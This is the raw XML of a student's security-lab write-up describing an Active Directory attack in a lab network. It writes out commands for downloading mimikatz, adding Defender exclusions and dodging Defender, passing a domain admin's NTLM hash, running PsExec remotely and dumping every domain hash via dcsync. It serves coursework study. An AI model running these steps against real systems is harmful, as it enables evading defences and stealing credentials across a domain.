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47606" w14:textId="34E5DEE3" w:rsidR="00F45477" w:rsidRDefault="00F45477" w:rsidP="00F45477">
      <w:r w:rsidRPr="000F4FB2">
        <w:t xml:space="preserve">System security - lab </w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14708AB1" w14:textId="77777777" w:rsidR="00F45477" w:rsidRDefault="00F45477" w:rsidP="00F45477"/>
    <w:p w14:paraId="7B781C07" w14:textId="7492CBA3" w:rsidR="00827AC5" w:rsidRDefault="00F45477">
      <w:r>
        <w:t>In this week we will expand on what we learned in lab 1, 2 and 3</w:t>
      </w:r>
      <w:r w:rsidR="00AB6ABB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA57D6A" w14:textId="77777777" w:rsidR="00AB6ABB" w:rsidRDefault="00AB6ABB"/>
    <w:p w14:paraId="7AF21EBF" w14:textId="0E2306D9" w:rsidR="00AB6ABB" w:rsidRDefault="00605426">
      <w:r>
        <w:t xml:space="preserve">Now, because we know we can get onto the admin PC via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, we should try to run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Psloggedon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to see if there is anyone else logged on to the admin pc, such as the domain controller. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE21411" w14:textId="3902C6AF" w:rsidR="00605426" w:rsidRDefault="00605426">
      <w:r>
        <w:t xml:space="preserve">To do this, I follow lab 3’s steps to open up the admin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A71B1">
        <w:t xml:space="preserve">, once that’s done I’ll look into installing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A71B1">
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A71B1">
        <w:t xml:space="preserve">, excluding the C: disk from windows defender, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A71B1">
        <w:t>installing+running</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A71B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A71B1">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A71B1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD558AE" w14:textId="77777777" w:rsidR="006A71B1" w:rsidRDefault="006A71B1"/>
    <w:p w14:paraId="071CE6EA" w14:textId="247A601E" w:rsidR="006A71B1" w:rsidRDefault="006308B7">
      <w:r>
        <w:t xml:space="preserve">I was able to download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by going to the Downloads folder and using curl -L -o SysinternalsSuite.zip </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00064F2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://download.sysinternals.com/files/SysinternalSuite.zip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004A5197">
        <w:t xml:space="preserve"> , I did this so that I’d have access to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004A5197">
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004A5197">
        <w:t xml:space="preserve"> on the admin machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61218563" w14:textId="171E3A4D" w:rsidR="006308B7" w:rsidRDefault="006308B7">
      <w:r>
        <w:t>Then, I  went to the downloads folder and ran tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SysinternalsSutie.zip, to unzip it. This resulted in all the files being extracted into the Downloads folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE24130" w14:textId="77777777" w:rsidR="007627C5" w:rsidRDefault="007627C5"/>
    <w:p w14:paraId="51F72802" w14:textId="037A8AC0" w:rsidR="00B832FD" w:rsidRDefault="007627C5">
      <w:r>
        <w:t xml:space="preserve">Then, to find out how to exclude the C: disk in windows defender from CMD, I tried a few things. One of them was to use cd C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24030.9-0 so that I can try to run MpCmdRun.exe with a command to exclude. </w:t>
      </w:r>
      <w:r w:rsidR="00793CC2">
        <w:t xml:space="preserve">Couldn’t find much. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0FCEC4" w14:textId="3F41F5D0" w:rsidR="00B832FD" w:rsidRDefault="00B832FD">
      <w:r>
        <w:t xml:space="preserve">I went to the Users\Administrator\Downloads folder and ran </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -Command “Start-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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Argumentlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ‘Add-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MpPreference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExclusionPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “C:\Users\Administrator\Downloads”’ which didn’t seem to return any errors. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D341A6" w14:textId="77777777" w:rsidR="00793CC2" w:rsidRDefault="00793CC2"/>
    <w:p w14:paraId="1CB9AE66" w14:textId="57B34B50" w:rsidR="00BF7097" w:rsidRDefault="00BF7097">
      <w:r>
        <w:t xml:space="preserve">Then, I downloaded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using Curl -L -o mimikatz_trunk.zip </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00064F2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20170813/mimikatz_trunk.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55407B66" w14:textId="77777777" w:rsidR="00BF7097" w:rsidRDefault="00BF7097"/>
    <w:p w14:paraId="5F724F4A" w14:textId="5C56500F" w:rsidR="00BF7097" w:rsidRDefault="00BF7097">
      <w:r>
        <w:t>Mike did say that curl wasn’t too reliable,</w:t>
      </w:r>
      <w:r w:rsidR="002B1D72">
        <w:t xml:space="preserve"> because </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B1D72">
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B1D72">
        <w:t xml:space="preserve"> now outbound from the admin machine. S</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="002B1D72">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">he showed us another way to download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDA1EBF" w14:textId="473CF34A" w:rsidR="000149AA" w:rsidRDefault="00DB749A">
      <w:r>
        <w:t xml:space="preserve">Net use x: \\192.168.56.30\c$ </w:t>
      </w:r>
      <w:r w:rsidR="007764B4">
        <w:t xml:space="preserve">then go to x:, which will put us in the x drive on our own machine, which allows us to cd into the folders on there, allowing us to copy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007764B4">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007764B4">
        <w:t xml:space="preserve"> to the folder we made and excluded. </w:t>
      </w:r>
      <w:r w:rsidR="000149AA">
        <w:t>(( copy c:\Users\</w:t>
      </w:r>
      <w:r w:rsidR="00654211">
        <w:t>Normaluser\</w:t>
      </w:r>
      <w:r w:rsidR="000149AA">
        <w:t>Downloads\Mimikatz_trunk\x64\*.* . ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB3FD7C" w14:textId="264EA3D7" w:rsidR="000149AA" w:rsidRDefault="002B4B03">
      <w:r>
        <w:t xml:space="preserve">We need to open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> before windows defender can catch it in transit, defender cant delete an open file handle. So we need to be quick to open mimikatz.exe once we copy it over. </w:t>
      </w:r>
      <w:r w:rsidR="00695E05">
        <w:t xml:space="preserve">I did this by going to x: , </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00695E05">
        <w:t>cd’ing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00695E05">
        <w:t xml:space="preserve"> to Users\Administrator\Downloads and having mimikatz.exe ready to run. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EC263D" w14:textId="2E9FC99E" w:rsidR="008C30DD" w:rsidRDefault="008C30DD">
      <w:r>
        <w:t xml:space="preserve">Success! Opened a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> window. Now I can repeat the commands to get hashes, and try to pass the hash to the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589338F3" w14:textId="72443525" w:rsidR="00B832FD" w:rsidRDefault="0034673D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This shows that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD25ED">
        <w:t xml:space="preserve">(which we know is a domain administrator from the net group commands from previous lab) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ntlm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hash cff48581d56085119bddffacfae51aeb. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AE15E2" w14:textId="77777777" w:rsidR="00FD25ED" w:rsidRDefault="00FD25ED"/>
    <w:p w14:paraId="6296DD5D" w14:textId="5CED61DF" w:rsidR="008A5902" w:rsidRDefault="008A5902">
      <w:r>
        <w:t xml:space="preserve">I can run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command from previous lab, this time with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user:domad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domain:ADLAB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. This doesn’t seem to work though, so maybe I’m in the wrong location. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC8F8A0" w14:textId="77777777" w:rsidR="00D53F30" w:rsidRDefault="00D53F30"/>
    <w:p w14:paraId="6CCFFF86" w14:textId="14804EE4" w:rsidR="00D53F30" w:rsidRDefault="00501A01">
      <w:r>
        <w:t xml:space="preserve">I can go back to my client pc and run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command with user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on domain win10client which does work and opens me a CMD. </w:t>
      </w:r>
      <w:r w:rsidR="0050048B">
        <w:t xml:space="preserve">I can run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0050048B">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0050048B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="0050048B" w:rsidRPr="00064F2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\192.168.56.10\c$</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0050048B">
        <w:t xml:space="preserve"> successfully. Now I can run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0050048B">
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0050048B">
        <w:t xml:space="preserve"> -r </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0050048B">
        <w:t>ExecPs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0050048B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="0050048B" w:rsidRPr="00064F2E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\192.168.56.10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0050048B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0050048B">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0050048B">
        <w:t xml:space="preserve"> from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0050048B">
        <w:t>sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0050048B">
        <w:t xml:space="preserve"> suite folder on my client machine, which opens a CMD on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0050048B">
        <w:t>domad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0050048B">
        <w:t xml:space="preserve"> pc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527FC53B" w14:textId="534C5079" w:rsidR="00E44972" w:rsidRDefault="00E97206">
      <w:r>
        <w:t xml:space="preserve">I don’t need to do this, just pass the hash and then run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (which runs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as domain controller).</w:t>
      </w:r>
      <w:r w:rsidR="00641179">
        <w:t xml:space="preserve"> This lets me run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6C7DF9" w14:textId="489DDABF" w:rsidR="00641179" w:rsidRDefault="00641179">
      <w:r>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dcsync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>domain:adlab.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /all /csv “ that dumps all the hashes of everyone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB3D1C" w14:textId="77777777" w:rsidR="0083272B" w:rsidRDefault="0083272B"/>
    <w:p w14:paraId="1C1F1F82" w14:textId="77777777" w:rsidR="009438B5" w:rsidRDefault="009438B5"/>
    <w:p w14:paraId="702C27F3" w14:textId="31302315" w:rsidR="009438B5" w:rsidRDefault="009438B5">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>skillstest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will only have 1 of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> escalation methods, so we need to be able to do all of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52271780" w14:textId="3C95F268" w:rsidR="00AB6ABB" w:rsidRDefault="00AB6ABB"/>
    <w:sectPr w:rsidR="00AB6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77"/>
    <w:rsid w:val="000149AA"/>
    <w:rsid w:val="000219C7"/>
    <w:rsid w:val="000B66C1"/>
    <w:rsid w:val="001421EA"/>
    <w:rsid w:val="00195FD9"/>
    <w:rsid w:val="002B1D72"/>
    <w:rsid w:val="002B4B03"/>
    <w:rsid w:val="0034673D"/>
    <w:rsid w:val="00383EE5"/>
    <w:rsid w:val="003B6D2D"/>
    <w:rsid w:val="004056DA"/>
    <w:rsid w:val="004476EF"/>
    <w:rsid w:val="004A5197"/>
    <w:rsid w:val="004B7B55"/>
    <w:rsid w:val="0050048B"/>
    <w:rsid w:val="00501A01"/>
    <w:rsid w:val="00605426"/>
    <w:rsid w:val="006308B7"/>
    <w:rsid w:val="00641179"/>
    <w:rsid w:val="00654211"/>
    <w:rsid w:val="00695E05"/>
    <w:rsid w:val="006A71B1"/>
    <w:rsid w:val="0070416A"/>
    <w:rsid w:val="0076127C"/>
    <w:rsid w:val="007627C5"/>
    <w:rsid w:val="007764B4"/>
    <w:rsid w:val="00793CC2"/>
    <w:rsid w:val="007F6403"/>
    <w:rsid w:val="00827AC5"/>
    <w:rsid w:val="0083272B"/>
    <w:rsid w:val="0086544D"/>
    <w:rsid w:val="008A5902"/>
    <w:rsid w:val="008C30DD"/>
    <w:rsid w:val="009438B5"/>
    <w:rsid w:val="009969FB"/>
    <w:rsid w:val="00A0043C"/>
    <w:rsid w:val="00AB6ABB"/>
    <w:rsid w:val="00B832FD"/>
    <w:rsid w:val="00BF7097"/>
    <w:rsid w:val="00CF0A21"/>
    <w:rsid w:val="00D53F30"/>
    <w:rsid w:val="00DB749A"/>
    <w:rsid w:val="00E44972"/>
    <w:rsid w:val="00E7384F"/>
    <w:rsid w:val="00E97206"/>
    <w:rsid w:val="00F45477"/>
    <w:rsid w:val="00FD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D0CF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4AEE6777-438D-41F8-9DB3-8855398F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4547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F4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5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54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454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547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547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5477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547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5477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547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5477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F4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547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547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F4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45477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F4547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4547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5477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F454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6308B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30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192.168.56.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92.168.56.10\c$" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20170813/mimikatz_trunk.zip" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://download.sysinternals.com/files/SysinternalSuite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557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Zandstra (21057877)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Coen Zandstra (21057877)</cp:lastModifiedBy>
  <cp:revision>48</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-30T10:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-30T12:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>